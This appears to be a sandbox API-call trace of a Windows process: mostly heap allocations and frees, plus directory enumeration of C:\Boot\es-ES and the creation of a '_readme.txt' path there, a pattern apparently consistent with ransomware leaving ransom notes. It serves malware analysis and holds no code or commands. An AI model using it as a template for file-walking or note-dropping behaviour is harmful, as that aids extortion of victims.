[0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.504] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.504] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.505] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.505] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.505] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.505] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328f498 [0146.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.505] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.505] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328f498 [0146.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.505] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a50 [0146.505] PathFindFileNameW (pszPath="C:\\Boot\\es-ES\\") returned="es-ES\\" [0146.505] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0146.505] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a28 | out: hHeap=0x6e0000) returned 1 [0146.505] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0146.505] PathFindFileNameW (pszPath="") returned="" [0146.505] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75f80000 [0146.505] GetProcAddress (hModule=0x75f80000, lpProcName="SHGetFolderPathW") returned 0x76005708 [0146.505] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x329e270 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0146.506] FreeLibrary (hLibModule=0x75f80000) returned 1 [0146.506] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a50 | out: hHeap=0x6e0000) returned 1 [0146.506] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.506] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.506] PathAppendW (in: pszPath="C:\\Boot\\es-ES\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0146.506] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.506] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.506] PathFileExistsW (pszPath="C:\\Boot\\es-ES\\_readme.txt") returned 1 [0146.507] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328f498 | out: hHeap=0x6e0000) returned 1 [0146.507] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.507] FindFirstFileW (in: lpFileName="C:\\Boot\\es-ES\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0146.507] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.507] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0146.507] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe84ea6d7, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0146.507] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 1 [0146.507] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1eaf9890, ftCreationTime.dwHighDateTime=0x1d5956a, ftLastAccessTime.dwLowDateTime=0x1eaf9890, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x1eaf9890, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x45d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="_readme.txt", cAlternateFileName="")) returned 0 [0146.507] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x32408c0 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x32408c0 [0146.508] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.508] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.508] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.509] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.509] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc2e) returned 0x329e270 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.510] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.510] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x860) returned 0x329e270 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x820) returned 0x328ec10 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0xc46) returned 0x329e270 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x329e270 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x840) returned 0x328ec10 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | out: hHeap=0x6e0000) returned 1 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x3240a78 | out: hHeap=0x6e0000) returned 1 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x20) returned 0x3240a78 [0146.511] RtlAllocateHeap (HeapHandle=0x6e0000, Flags=0x0, Size=0x830) returned 0x328ec10 [0146.511] HeapFree (in: hHeap=0x6e0000, dwFlags=0x0, lpMem=0x328ec10 | 